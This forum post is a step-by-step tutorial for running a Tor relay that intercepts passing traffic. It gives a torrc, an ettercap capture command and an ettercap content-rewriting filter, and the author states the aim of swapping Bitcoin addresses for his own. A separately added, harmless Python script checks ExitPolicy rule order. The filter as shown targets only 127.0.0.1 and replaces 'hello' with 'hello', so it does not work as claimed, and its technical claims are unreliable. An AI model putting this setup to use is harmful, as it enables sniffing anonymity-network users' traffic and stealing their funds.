Tor MiTM Relay

XMAN

Tor MiTM Relay #1
So in light of recent events I thought I'd show you a quick way to set up a Tor MiTM Relay. This was done on Debian Buster (10.5).

Let's install Tor (you can get the latest packages by adding the Tor repo to your /apt/sources.list).
Code:
apt update
apt install tor

When those packages have finished installing, Tor will automatically start running, so let's stop that.
Code:
systemctl stop tor

Now remove the default Tor config.
Code:
rm /etc/tor/torrc

Now create a new torrc file and paste the following.
Code:
touch /etc/tor/torrc
Code:
SOCKSPort 192.168.0.1:9100 # Bind to this address:port too, default is 9050
ExitPolicy accept *:80-444
ExitPolicy reject *:82-6500
ControlPort 9051
HashedControlPassword 16:BE7C48D44CF26570606B3676D65DC5357788CC1CF14006B06F5BC2399D # DO NOT USE THIS PASSWORD! Replace with your own hash (see below)
Nickname YOURRELAYNAME # CHANGE ME
ORPort 9001
SocksListenAddress 127.0.0.1

Remember to replace the HashedControlPassword value with the output of the following, and the Nickname with whatever you want.
Code:
tor --hash-password YOURPASSWORD

Now we are ready to run Tor. If you have kept your torrc file under /etc/tor/torrc, this will be the default config. Now run the following (not as root!).
Code:
tor -f /etc/tor/torrc

Wait until Tor finishes connecting and open a new root terminal. Now it's time to install ettercap (you could probably use another tool if you wanted).
Code:
apt install ettercap

Now our relay is up and running, so how do we start sniffing the traffic? With one simple command:
Code:
ettercap -T -w dump.pcap -E -i wlp2s0

This is now a Tor relay which is sniffing all the traffic going through it. You could probably add a filter to modify traffic on the fly. (Currently trying to get this working with a regex; if anyone has any ideas about this then send me a PM. I've already got the filter ready, it just needs a little tweaking.) The filter for replacing text is below. Adding something like this (^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$) to the script below would allow you to replace any Bitcoin address with yours (in theory).

Code:
##
#  This filter replaces certain words in TCP packet
#  requests before forwarding the packet back to the target host.
#  Based on code from ALoR, NaGA & Morpheus
##

##########################
## Zap Content Encoding ##
##########################
# change target request to server
if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!");
    msg("\n[test] host:127.0.0.1   [ ⊶  ]  found ☆");
    msg("[test] |_ packet Accept-Encoding zapped ✔\n");
  }
}

if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {
  msg("[test] host:127.0.0.1   [ <- ]  port:80 http ☆");
  if (search(DATA.data, "gzip")) {
    replace("gzip", "    "); # note: four spaces in the replacement string
  }
}

if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "deflate")) {
    replace("deflate", "       "); # note: seven spaces in the replacement string
  }
}

#####################
## Replace Content ##
#####################
# change server response to target
if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.src == 80) {
  if (search(DATA.data, "hello")){
    replace("hello", "hello");
    msg("\n[test] host:127.0.0.1   [ ⊶  ]  found ☆");
    msg("[test] | status : string found in tcp packet ✔");
    msg("[test] |_info   : packet forward back to target ✔\n");
  }
}
 
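Added example (not part of XMAN's post, and not Tor Project code): the two ExitPolicy lines in the torrc above overlap (accept *:80-444 is followed by reject *:82-6500), and tor resolves that by first match, not by the most specific or the last rule. The checker below re-implements that rule order offline, so you can see which rule actually decides for a given destination before starting the relay. The two ExitPolicy lines are copied from the post; the private-network list (ExitPolicyRejectPrivate, on by default) and the built-in default exit policy are the ones given in the tor(1) manual as I remember them, so confirm them against your installed version; the destination addresses are constructed. IPv6 rules and the relay's own address (which ExitPolicyRejectPrivate also rejects) are not handled.

```python
"""Show which ExitPolicy rule decides for a destination, with tor's first-match
order: private-network rejects, then your ExitPolicy lines, then tor's default.

Added example, not from the post or the Tor Project. PRIVATE_NETS and
DEFAULT_EXIT_POLICY are taken from the tor(1) manual from memory: verify them.
"""
import ipaddress

# ExitPolicyRejectPrivate 1 (the default) rejects these before your own rules
PRIVATE_NETS = [
    "0.0.0.0/8", "169.254.0.0/16", "127.0.0.0/8",
    "192.168.0.0/16", "10.0.0.0/8", "172.16.0.0/12",
]

# tor appends this after the last ExitPolicy line in torrc
DEFAULT_EXIT_POLICY = [
    "reject *:25", "reject *:119", "reject *:135-139", "reject *:445",
    "reject *:563", "reject *:1214", "reject *:4661-4666",
    "reject *:6346-6429", "reject *:6699", "reject *:6881-6999",
    "accept *:*",
]

# The two rules from the post's torrc, verbatim
POST_TORRC = """\
ExitPolicy accept *:80-444
ExitPolicy reject *:82-6500
"""


def parse_rule(entry):
    """'accept *:80-444' -> ('accept', None, 80, 444); None means any address."""
    action, target = entry.split(None, 1)
    action = action.lower()
    if action not in ("accept", "reject"):
        raise ValueError(f"unknown action in rule {entry!r}")
    addr, _, ports = target.rpartition(":")
    net = None if addr == "*" else ipaddress.ip_network(addr, strict=False)
    if ports == "*":
        lo, hi = 1, 65535
    elif "-" in ports:
        lo, hi = (int(p) for p in ports.split("-", 1))
    else:
        lo = hi = int(ports)
    return (action, net, lo, hi)


def build_policy(torrc_text, reject_private=True):
    """Ordered rule list tor evaluates for this torrc (private, yours, default)."""
    rules = []
    if reject_private:
        rules += [("reject", ipaddress.ip_network(n), 1, 65535) for n in PRIVATE_NETS]
    for line in torrc_text.splitlines():
        parts = line.split("#", 1)[0].split(None, 1)  # drop trailing comments
        if len(parts) == 2 and parts[0].lower() == "exitpolicy":
            rules += [parse_rule(e.strip()) for e in parts[1].split(",") if e.strip()]
    rules += [parse_rule(e) for e in DEFAULT_EXIT_POLICY]
    return rules


def decide(rules, dest_ip, dest_port):
    """Return (action, index of deciding rule). The first match wins, so a
    later 'reject' never overrides an earlier 'accept' covering the same port."""
    ip = ipaddress.ip_address(dest_ip)
    for i, (action, net, lo, hi) in enumerate(rules):
        if lo <= dest_port <= hi and (net is None or ip in net):
            return action, i
    raise RuntimeError("unreachable: the default policy ends in accept *:*")


def shadowed_ports(rules, index):
    """Port intervals of wildcard rule rules[index] that an earlier wildcard
    rule already decides, i.e. where rules[index] has no effect at all."""
    _, net, lo, hi = rules[index]
    if net is not None:
        raise ValueError("only '*' address rules are analysed")
    covered = set()
    for _, enet, elo, ehi in rules[:index]:
        if enet is None:
            covered.update(range(max(lo, elo), min(hi, ehi) + 1))
    intervals, start, prev = [], None, None
    for p in sorted(covered):
        if start is None or p != prev + 1:
            if start is not None:
                intervals.append((start, prev))
            start = p
        prev = p
    if start is not None:
        intervals.append((start, prev))
    return intervals


RULES = build_policy(POST_TORRC)

if __name__ == "__main__":
    for ip, port in [("93.184.216.34", 443), ("93.184.216.34", 445),
                     ("93.184.216.34", 25), ("93.184.216.34", 22),
                     ("192.168.0.1", 80)]:
        action, i = decide(RULES, ip, port)
        print(f"{ip}:{port} -> {action} by rule {i}: {RULES[i]}")
    print("reject *:82-6500 never fires for ports", shadowed_ports(RULES, 7))
```

Running it shows that 443 is accepted by the first rule even though the second rule "rejects" 82-6500, that the second rule only ever decides for 445-6500, and that ports outside both ranges fall through to tor's default policy (25 rejected, 22 accepted). The same first-match reasoning is what tor applies when it publishes your exit policy, so checking it this way avoids advertising ports you did not mean to exit to.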